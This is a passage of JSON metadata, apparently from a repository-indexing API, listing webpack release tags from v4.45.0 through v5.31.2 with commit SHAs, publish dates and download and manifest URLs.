2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://rep